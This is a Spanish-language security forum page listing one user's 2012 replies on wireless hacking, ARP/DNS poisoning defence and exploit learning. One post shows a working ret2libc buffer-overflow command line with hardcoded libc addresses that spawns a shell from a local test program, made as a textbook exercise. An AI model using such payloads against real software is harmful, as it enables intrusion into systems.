elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Mensajes
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ... 79
51  Seguridad Informática / Hacking Wireless / Re: Handshake en: 3 Marzo 2012, 18:20 pm
O con una granja de servidores, o con mucha suerte con un diccionario.

Saludos
52  Seguridad Informática / Hacking Wireless / Re: [Problema]Al poner la essid en aireplay no autentifico en: 3 Marzo 2012, 18:18 pm
Citar
nunca veo a ningun conectado solo a uno

En fin...

No sé por qué me da que tu tarjeta va a ser una intel, y que te está fallando por tirar el ataque con mon0. Una manera más simple de simular estas cosas puede ser conectarte a la red con iwconfig, lo que pasa que a veces te va a sacar tu propia clave...

Te cierro el post porque incumple las normas.

Saludos
53  Seguridad Informática / Hacking Wireless / Re: Me ayudais con una investigacion? un par de dudas que tengo en: 21 Febrero 2012, 22:22 pm
Que cree el ladrón, que todos son de su condición.

Saludos
54  Seguridad Informática / Hacking Wireless / Re: Ordenadores conectados a mi wifi? en: 18 Febrero 2012, 12:37 pm
O si quieres algo más profesional, usa nmap, pero desde luego lo más fiable y lo que nunca engaá es la tabla del router.

Saludos
55  Seguridad Informática / Hacking Wireless / Re: arp dns envenenado, a que se debe? en: 18 Febrero 2012, 00:24 am
Quiere decir que si no tienes cuidado, puede suplantarte cualquier página web y que tú creas que sea la verdadera de manera que te capture la password.

También para envenenarte la dns tiene que estarte haciendo un arp poison, por lo tanto está sniffando tu tráfico, con lo que si envías cosas sin SSL, puede ver directamente tus cookies y suplantarte en las páginas.

De todas maneras, siempre puede ser un falso positivo. Cuando te salga esos positivos, entra al router y mira si solo tú estás conectado a él, o mira tu tabla de arp para ver si sigues teniendo la misma mac de siempre en el router.

Saludos
56  Seguridad Informática / Bugs y Exploits / Re: ¿Se puede agotar la transferencia mensual de un sitio así? en: 17 Febrero 2012, 21:00 pm
Opino que si eres capaz de hacer que el navegador no use la caché, sí.

Saludos
57  Seguridad Informática / Wireless en Linux / Re: Ruta del diccionario para Bactrack en un pen-drive en: 15 Febrero 2012, 23:18 pm
Si no montas el disco y linux no está configurado para que los monte por tí al arrancar o al detectarlos, no podrás acceder a ninguna partición de ningún disco duro.

Para eso infórmate sobre los usos del comando mount.

También si lo tienes instalado en un modo no live, puedes tocar el /etc/fstab

Saludos
58  Seguridad Informática / Hacking Wireless / Re: arp dns envenenado, a que se debe? en: 15 Febrero 2012, 23:16 pm
Revisa tu wireless que no tengas a nadie conectado y cambia de inmediato la contraseña a una WPA y si ya la tienes, cambia tu contraseña...

Puede que sea un falso positivo del antivirus, pero quiere decir que te están direccionando a dónde quieren con los dns...

Saludos
59  Seguridad Informática / Bugs y Exploits / Re: Esta vez duda usando libc en: 13 Febrero 2012, 23:00 pm
Dios Ivanchuk!

Lo logré!!!!

Código:
pianista@pianista-desktop:~ $ BUF=`perl -e 'print " " x 200 . "/bin/sh;" . "A" x 516 . "\x80\x0d\xed\xb7" . "\xf0\x68\xec\xb7" . "\xbe\xc7\xfb\xb7"'`
pianista@pianista-desktop:~ $ ./victim $BUF
sh-3.2$


Muchísimas gracias.

Ya te marearé a partir de ahora con los format Strings :)

Saludos!

PD:Lo que sigo sin entender son los 200 espacios de después del /bin/sh
60  Seguridad Informática / Bugs y Exploits / Re: Esta vez duda usando libc en: 12 Febrero 2012, 22:04 pm
Ahhh ok.

Una duda, y entonces porque en ret2libc no lo están pasando???
(Bueno también menuda pregunta voy a hacer si ni tú ni yo hemos implementado eso xD)

El ret2libc lo corregí respecto al libro según indicaba aquí (era obvio que faltaba eso):
http://shellcoders.blogspot.com/2010/08/chapter-2-using-exploit-pp-31-38.html

Ahh y el uso de memfetch:

http://shellcoders.blogspot.com/2009/05/using-memfetch-page-37.html

Saludos y gracias por tu ayuda Ivanchuk, la verdad es que la idea de volver por ret2libc conceptualmente la tengo asimilada, el problema era que quería probarla, pero vamos me está dando tanto la lata, que lo mismo me paso ya a experimentar con los juegos con los format string
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ... 79
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines